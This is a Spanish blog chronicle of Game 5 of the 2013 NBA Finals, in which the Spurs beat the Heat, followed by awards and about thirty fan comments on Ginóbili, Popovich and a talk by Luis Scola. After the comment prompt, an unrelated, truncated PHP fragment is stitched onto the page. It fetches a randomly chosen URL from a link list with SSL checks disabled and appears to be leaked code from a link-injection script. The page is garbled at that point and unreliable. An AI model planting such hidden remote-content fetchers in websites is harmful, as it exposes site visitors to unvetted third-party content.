La Crónica: Jugada maestra

17 de June de 2013 por MagicJohnson32

Manu

Movió piezas el Maestro Popovich, y el tablero fue suyo. Enrocó de entrada, resguardó a su rey Duncan y desplegó a sus alfiles, que fueron anoche los encargados de masacrar a las piezas de Spoelstra, una a una. Todo lo que sucedió sobre el parquet del AT&T Center de San Antonio fue por designio del técnico de los Spurs, figura capital en la victoria (104-114) que adelanta de nuevo a los texanos en estas Finales 2013 de la NBA.

Y, de entre todas las decisiones de Popovich, una marcó el encuentro de anoche y puede que el resultado de la serie: Manu Ginóbili, negado hasta el momento en toda la eliminatoria hasta el punto de ser objeto de especulaciones sobre su retirada, partió como titular por primera vez en toda la temporada. El argentino anotó o asistió en los primeros 10 puntos de su equipo, presagio de la que sería una noche que le vio erigirse como el mejor jugador de la velada. A partir de la renovada frescura de Ginóbili, incisivo y acertado como hacía mucho que no le veíamos, el ataque de los Spurs desarmó a los Heat una y otra vez. Cuando no era Manu, era Tony Parker quien dejaba en evidencia a Chalmers o Cole, y cuando no, aparecía Danny Green para escribir una página en la historia de la liga, una redactada a golpe de triple. Green, que a ratos parece el Stephen Curry de los terceros cuartos, ya ha alcanzado el récord de triples en unas Finales y con el 6 de 10 de anoche elevó sus números desde detrás de la línea en esta serie hasta un ridículo 25 de 38.

De esta manera, con el añadido de las aportaciones constantes de Duncan y Leonard, el ataque de los Spurs se movió en unos niveles de eficiencia imposibles para los Heat, que fueron haciendo la goma toda la noche. El primer cuarto ya acabó con un 19-32 para los Spurs y, después de tres triples seguidos de Green, la renta se amplió hasta el 28-45 mediado el segundo periodo. Bosh, Wade y LeBron comandaron entonces la primera reacción de los Heat, aprovechando varias pérdidas del equipo local para recortar la diferencia hasta los 5 puntos antes de que Tony Parker coronase la primera mitad con dos canastas que dejaban el marcador 52-61.

Pese a la superioridad de los Spurs en la mayor parte de lo jugado hasta el momento, la inercia del partido podía indicar una segunda mitad dominada por los Heat, y más aún cuando 8 puntos seguidos de los Heat en la reanudación pusieron el 60-61. Pero no perdieron la compostura los Spurs y Popovich se sacó otro as de la manga: situó a Boris Diaw sobre LeBron James y, por absurdo que pueda parecer a cualquiera que no lo viese con sus propios ojos, el francés secó a James (tanto como es humanamente posible). En el otro lado de la pista, Danny Green metió otros dos triples y asistimos al resurgir definitivo de Ginóbili, protagonista de un prodigioso tramo final de tercer cuarto en el que dejó varias acciones de Vintage Manu. El parcial se extendió en el arranque del último cuarto y creció hasta dejar el partido sentenciado (76-96 a 9:00 para la conclusión tras un 2-21). Los minutos finales fueron poco más que un trámite amenizado por los triples de Ray Allen hasta que sonó el bocinazo final.

Las Finales se despiden de San Antonio con un 3-2 favorable a los Spurs, que viajarán a Miami con dos oportunidades de lograr su quinto anillo. El Rey James está en jaque. Su turno.

PREMIOS

lebron splitter diawMVP: Manu Ginóbili salió de titular y desde el minuto 1 dejó su huella en el juego de los SpursAnotó la primera canasta del partido y ya no paró hasta conseguir 24 puntos y 10 asistencias. Su aportación en los minutos finales del tercer cuarto, cuando los Heat se pusieron a solo un punto, fue clave para llevarse la victoria.

Sorpresa: Sorpresa ninguna pero Danny Green anotó 6 triples de 10 intentos y superó el récord de triples anotado en unas Finales. Lleva 25 y aún le quedan 1 o 2 partidos para mejorarlo. El anterior poseedor de la marca, Ray Allen, anotó 21 puntos con 4 de 4 en triples.

Decepción: LeBron James acabó la primera parte a muy buen ritmo pero se hundió en la segunda. La defensa de Boris Diaw le hizo fallar 7 de los 8 lanzamientos que intentó. Mike Miller encadenó su segundo partido consecutivo sin anotar. Lo de salir de titular no le sienta nada bien.

Esfuerzo en vano: Dwyane Wade acabó el partido con 25 puntos y 10 asistencias y aguantó a los Heat en el partido en el tercer cuarto hasta que Ginóbili decidió que ya había suficiente.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

30 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Y decidició el Big Three…. de San Antonio. ¡Bienvenido a las Finales Manudonna!!
    Gran partido de nuevo de los Spurs. Si después del tercero la ventaja parecía claramente irse hacia unos Heat más frescos y jóvenes que los Spurs, éstos han vuelto a darnos a todos una lección impagable dominando totalmente este quinto partido y poniéndose a un paso de un título que creo que merecen de todas todas.
    Para empezar sorpresas en el quinteto Spur. El maestro Popovich sabemos que no es de los que se quedan sin hacer nada y decidió dar galones de salida a Manudonna y cómo le respondió éste. Salió como un tiro y comandó a su equipo a una renta de +13 en el primer cuarto apoyado por los triplazos de Green. Importante también la salida de Diaw por un Splitter al que la velocidad de las Finales le está viniendo muy mal.
    La reacción vino de parte del Big Three de Miami que aguantó haciendo la goma y situó a 5 a su equipo antes del descanso. Sin embargo de nuevo un inspirado Ginobilli amplió la ventaja en el tercero junto a Duncan y al incansable trabajo de un fenomenal Kawhi Leonard. Quedaban 12 minutos para que los Heat pudieran intentar dar la vuelta a 12 puntos abajo pero ni por asomo estuvieron cerca. Esta vez LeBron fue el que no dió la talla y sólo Wade y Allen lucharon hasta el final por una remontada que estuvo lejos de producirse, bien parada por un Parker que tomó la batuta en los minutos finales.
    Por San Antonio partidazo de casi todos, con Manudo a la cabeza pero con Parker, Duncan, Leonard y Green muy inspirados. Esta vez no fue el día de Neal ni Splitter pero es que en estos partidos decisivos ya son los jefes los que marcan las diferencias. Por los Heat fenomenal de nuevo Wade que parece haberse tomado un rejuvenecedor y bien LeBron hasta el descanso. Su apagón después fue una de las claves para que su equipo no pudiese aspirar a la remontada. También gran noche de Ray Allen, haciendo aquello para lo que se le fichó y que no venía haciendo ningún día. Sin embargo, el gran problema de los Heat fue la incapacidad para defender el ataque de San Antonio que les hizo un auténtico traje durante todo el partido tanto en acciones individuales de Parker-Ginobilli-Duncan como moviendo el balón para encontrar a los tiradores. San Antonio sabía que sin esta victoria el título era imposible y jugaron a muerte desde el salto inicial.
    Ahora las Finales vuelven a Miami con match-ball para los Spurs. El Rey se la jugará en casa. Para que esté algo más confiado su escudero Wade ha recuperado su juego y Bosh está algo mejor pero los Spurs ya han demostrado que pueden hacer frente a los Heat en cualquier modo. Nos esperan uno o dos partidos increíbles y si Manudo es capaz de sacarse otra exhibición así puede compensar la resurrección de Wade. Todos expectantes para el 6º. A mí estos Spurs ya me han conquistado

      Citar

  2. GreenPride dice:
    #2

    En el primer parrafo decía “si después del tercero…” Claramente me refería al cuarto…

      Citar

  3. txusma dice:
    #3

    Yo me voy organizando ya para ver el séptimo…

      Citar

  4. rumbero dice:
    #4

    El órdago que lanzó Pop metiendo a Ginobili de titular es de jodido genio. Le pudo salir mal, pero solo había que ver la cara del argentino y la de Spoelstra antes de empezar el partido. ¿Que suenan rumores de retirada y vienes de hacer un match 4 horrible? Nada hombre, vas a salir de titular por primera vez en toda la temporada y a ver que tal lo haces chaval. Para grabarse sus minutos en el tercer cuarto, Manu en estado puro. We Ginobilieve!

    Y el resto del quinteto titular de Spurs estuvo de 10. Ahora Parker haciendole un lio a Lebron, ese Kawhi que parece que lleve jugando a esto más años que Tim y sin que se note demasiado se marca un 6/8 más los intangibles de turno, si se atasca el tema un par de master class de Duncan en la pintura y ese fenómeno paranormal que está siendo Danny Green (al que aun siguen dejando solo estos Heat!!) que te mete dos triples seguidos desde su casa sin que vaya la presión con él. Yo como sorpresa hubiera metido a Diaw que jugó mucho y como dices defendió muy bien a Lebron aunque cueste creerlo (creo que le dejó en un 1/8) y le dió tiempo de demostrar que aprendió algo de Nash entre hamburgesa y chips con un par de pases muy majos.

    Y dicho esto Miami estuvo haciendo la goma casi todo el partido pese al mal partido en el tiro de James. Wade fue de lo mejorcito junto con Allen que se picó al final por el record que le robó Green y empezó a meter 3+1 y desde todos los lados (incluso un triple desde su casa que no valió por bloqueo ilegal de James que ponía a Miami a 8 a falta de poco). Y entiendo que jugando menos Splitter Spoelstra haga también sus retoques, pero ¿Birdman no está para jugar ni 10 minutillos con lo bien que lo ha hecho estos PO? No acabo de entenderlo. En fin, mucha calidad ayer en pista. Partido bonito bonito. Si va a ser así, queremos séptimo of course

      Citar

  5. AntoniAngel dice:
    #5

    Esto… ¿no podrían darle el MVP directamente a Popo, ganen o no los Spurs?

      Citar

  6. JHC dice:
    #6

    cuidao con los viejetes y con pop, creo que en el 6º van a por el titulo sin esperar a un séptimo aunque Lebron es Lebron…

      Citar

  7. HisRoyalAirness dice:
    #7

    Cada milímetro de mis ojeras merece la pena

      Citar

  8. Lucho dice:
    #8

    Que finales! Basquet en estado puro. Que manera de disfrutar
    De las mejores finales que vi, claramente

    Si termina ganando Spurs, el MVP para todo el equipo!! MVPop?

      Citar

  9. HisRoyalAirness dice:
    #9

    La capacidad creativa y de pase de Manu es algo que he visto en pocos jugadores. No es alguien que suela promediar dobles dígitos en este apartado pero más debido a su posición en el campo porque por talento natural podría promediar 12 tranquilamente. Me recuerda mucho a esa habilidad innata de gente que no jugaba de PG pero que eran los mejores pasadores de su equipo, como Bird o el gran Sabonis.
    Y sobre sus bandejas y su dribbling se podría escribir una oda.
    Disfruté como un enano.

      Citar

  10. Lucho dice:
    #10

    HisRoyalAirness:
    La capacidad creativa y de pase de Manu es algo que he visto en pocos jugadores. No es alguien que suela promediar dobles dígitos en este apartado pero más debido a su posición en el campo porque por talento natural podría promediar 12 tranquilamente. Me recuerda mucho a esa habilidad innata de gente que no jugaba de PG pero que eran los mejores pasadores de su equipo, como Bird o el gran Sabonis.
    Y sobre sus bandejas y su dribbling se podría escribir una oda.
    Disfruté como un enano.

    Que grande sos Manu

      Citar

  11. MagicJohnson32 dice:
    #11

      Citar

  12. L.Casei dice:
    #12

    Grande Pops… Me sumo al MVP para él…
    ¿Leisteis las declaraciones que hizo Popovich ras la interpretación del himno por Sebastien el niño de origen mexicano en el 3° partido tras los comentarios asquerosamente xenófobos que recibió el chaval?
    Qué tío, no se puede hablar mejor y con más coherencia… No se puede ser mejor entrenador.

    Y hala, a Miami. Habrá 7° partido… y va a ser la guerra. El partido de los partidos.

    In Pops we trust.

      Citar

  13. jose_dantley dice:
    #13

    No es momento para hablar de estadísticas y cuando tenga tiempo seré más preciso, pero hay una estadística que es el True Shooting Percentage que ayer debió reventar el 5 titular en una final de la NBA. Si solo dice mucho sobre el ataque de San Antonio o también algo sobre la defensa de Miami ya es otro tema, pero los números son sencillamente espectaculares.

      Citar

  14. Lucho dice:
    #14

    No, no lei nada. Que dijo Pop pot el tema del nene del himno??

    Una boludez qur acabo de descubrir: desde la retirada de Jordan, siempre estuvieron en las finales Heat, Lakers o Spurs

      Citar

  15. Lucho dice:
    #15

    Estoy en una clase de periodismo de basquet y vino a dar una charla Luis Scola. Lo tengo a 10 mts. No lo puedo creer

      Citar

  16. Simon dice:
    #16

    Madremia yo no se de donde salen los rumores de ese “super” equipo que se van a montar los Clippers jajaja cuanto mas leo sobre los posibles traspasos mas me parto de risa…. a ver:
    – DeAndre Jordan por Garnett: ¿para qué? Jordan es un pufo con un sueldazo para dos temporadas ( osea que terminaría a la vez que Garnett su contrato vale quieren reconstruir pero de seguro que Jordan no es un tio para una reconstruccion y menos a 11 millones… Además como “favor” por este traspaso tan “beneficioso” para Boston ( pobres Clippers que por Garnett tienen que dar a Jordan… ) los celtics encima cortarían a Pierces y Rivers que irian corriendo supuestamente a firmar por Clippers..WTF…

    Como creo en los Reyes Magos me voy a creer ese “traspaso con favores incluidos”
    – Seguidamente se renovaría a Paul. Y se procedería a traspasar a Griffin por Howard a pelo!!! si me dices que metes a gente tipo Bledsoe + rondas vale pero… ¿Perdón? En serio? a pelo? un tio que no ha demostrado ser un jugador franquicia… que va a cobrar el máximo y eso comprometería aún mas las cuentas de Lakers… ( no entro en las ganas que tendrá Lakers en reforzar al equipo vecino… q si no… )

    – Despues de esos dos movimientos… vamos con el último y ojo, el más creible. Clippers traspasaría a Bledsoe a cambio de Afflalo o Granger. Económicamente no encaja ni a la de tres pero vamos, deportivamente es el mas creible de todos.

    Ahora añado yo un par de movimientos que podrían terminar de apuntalar este proyecto Clippers.
    – Lakers agradecidos de conseguir a Griffin van a amnistiar a Bryant, ningún equipo pujará por el y firmará por el mínimo con Clippers para ejercer de sexto hombre y así no tener que mover a su familia de ciudad etc… ( encaja bastante no??? un tio con una edad y una estabilidad no querrá andar haciendo maletas ).
    – Para dar consistencia al juego interior, Crawford, que ha sido desplazo por Bryant será traspasado a cambio de Varejao y el pick 1 del Draft.

    Bonito no??? que cantidad de burradas hay que leer en ciertos sitios… siempre es divertido leer rumores, aunque sean sin fundamento, pero cuando son tonterías y se le da un rigor tan alto pues toca un poquito las pelotillas…

      Citar

  17. Lucho dice:
    #17

    Les interesa saber a quienes considera Scola como el mejor jugador que con el que compartio equipo (le pedi que excluyera a Manudona) y el mejor rival que enfrento? Quieren arriesgar?

      Citar

  18. MagicJohnson32 dice:
    #18

    Lucho:
    Les interesa saber a quienes considera Scola como el mejor jugador que con el que compartio equipo (le pedi que excluyera a Manudona) y el mejor rival que enfrento? Quieren arriesgar?

    ¡Sí, claro, cuéntanos cómo fue con Scola! El mejor compañero… no sé ¿Yao o McGrady?

      Citar

  19. Lucho dice:
    #19

    Si, el mejor jugador con el que compartio equipo (le dije que sacara a Manu, porque iba a ser obvio) fue Yao
    Y el jugador que mas le costo defender es Nowiztki. Ademas, me dijo que no tiene ninguna preferencia para este draft. La otra pregunta que le hice fue que periodista recomienda de alla, y nombro a Marc Stein, Simmons, Chris Sheridan, el chileno Sierra y Wojnarosky (creo que no se escribe asi).

    Scola, fenomeno total. Los que lo admiramos, como yo, y supongo que la mayoria de ustedes, al conocerlo personalmente confirmamos lo gigante que es. Una claridad barbara, la mejor predisposicion (se quedo 1 hora despues de la charla, responiendo preguntas de los alumnos, permitio todas las fotos), y le sobra humildad. Conto que le molesta el elogio desmedido que hay hacia su figura aca en la Argentina (que yo creo que es merecida, y, mas aun, que no le damos el reconocimiento que se merece esta seleccion aca en el pais)
    Aunque no lo dijo, se noto que se quedo con ganas de jugar en los Spurs: “no se que hubiera pasado, pero a San Antonio mal no le fue, consiguio 2 anillos y esta en otras finales en ese tiempo”. Dijo que lo que se hablaba en ese entonces era de su incompatibilidad con Duncan, pero que eso nunca se sabra, que la unica respuesta era verla en la cancha y no se dio.
    Sobre los entrenamientos, hizo hincapie sobre la diferencia que hay en Argentina y España, con mucho 5 vs 5, tacticas, trabajo tecnico y scouting, con respecto a Estados Unidos, donde sobresale el gimnasio y el entrenamiento individual. Casi ni se practica 5 vs 5
    Despues hablo sobre la relacion del jugador y el periodista, tanto en USA como en Europa o Argentina, de la necesidad de estar AMBOS preparados para la entrevista, que si un periodista hace preguntas estupidas es obligacion del jugador hacerselo saber y contestar como tal. De la situacion de la Liga Nacional Argentina de basquet, y de su vida diaria en EEUU. Y como los valores norteamericanos son diferentes a los de aca (desconozo en España, pero supongo que seran mas o menos como en Argentina): en EEUU si un jugador cobra menos de lo merece, se toma mal porque altera la competicion. Aca, se toma mal que no acepte bajarse el sueldo. O que se naturaliza que en USA si un equipo anda mal, se deje de ir a la cancha por ese motivo, o se vayan antes de que finalice el encuentro. En Argentina, seria un insulto al poder del hincha, una deshonra

    En sintesis, fenomeno total

      Citar

  20. jose_dantley dice:
    #20

    Interesantísima información, Lucho. Gracias por compartirla ¡¡¡

      Citar

  21. Lucho dice:
    #21

    De nada jose! Me alegro que te haya interesado

      Citar

  22. HisRoyalAirness dice:
    #22

    En España no es asi en absoluto Lucho, por desgracia. Sentido del honor? No existe.
    Muy interesante tu entrevista! Diles a los jefes de aquí que te pongan de corresponsal! jajaja

      Citar

  23. L.Casei dice:
    #23

    Vaya crack, Lucho!!
    Este foro es un lujo… da gusto hablar con gente que sabe de ésto… simplemente porque nos vuelve locos… xD.

    Vamos Pops!!

      Citar

  24. Lucho dice:
    #24

    Jajaj HisRoyal y Casei me alegro que les haya gustado!
    El sentido del honor aca existe, pero se roza con el opotunismo tambien
    Hay gente que le critica a Ginobili haber faltado a algunos torneos (se lo contrapone a Scola) , y lo trata de mercenario: pocas cosas mas absurdas he escuchado en mi vida. Lo que le dio Manu al basquet argentino, y el sacrificio que puso en ello, no tiene comparacion con nada. Hasta ha arriesgado la firma de un contrato con RC Buford, recuerdo (hace algunos años, obviamente). Yo sigo sosteniendo que esta generacion no tiene realmente todo el reconocimiento que merece
    Supongo que a Pau le ha pasado igual, gente que no entiende nada y opina de oido hay en todos lados… El sentido del honor en lo demas si existe aca. Me cuesta entender que España se asemeje mas a USA, no me lo esperaba. Mas con lo que le dio esta generacion de los Gasol, Calderon; Garbajosa o Navarro

      Citar

  25. MagicJohnson32 dice:
    #25

    Mil gracias por explicárnoslo, Lucho, muy interesante. Casi que podrías haberlo redactado tipo entrevista o reportaje y lo podríamos haber publicado, en plan “entrevista exclusiva de TJNBA a Scola” 😉

    Yo a Scola, no, pero tuve la suerte de conocer a otros jugadores argentinos de elite y me parecieron unos tíos fantásticos.

      Citar

  26. Lucho dice:
    #26

    Jaja no se me habia ocurrido Magic…

      Citar

  27. rumbero dice:
    #27

    ¿!!Me he despertado en 2003 o como va el tema?!!
    Lo que ha hecho Duncan en la primera parte madre de dios…

      Citar

  28. rumbero dice:
    #28

    pfff…que bestialidad de final de partido por dios.Y gente que se marchaba del estadio a falta de 30 segundos…

      Citar

  29. rumbero dice:
    #29

    Pues nos vamos al séptimo!
    Han pasado tantas cosas que uno no sabe ni por donde empezar..pero SA ha tenido el anillo puesto y se lo han quitado de las manos

      Citar

  30. Denise dice:
    #30

    Jojo!, vaya manera de perder el anillo de momento para SAS, esto de cara al septimo le va a pasar factura psicologicamente, han tenido el anillo en la mano y sin saber como lo han perdido.
    Si Miami gana el anillo, el ultimo rebote de Bosh justifica todo su salario de esta campaña

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>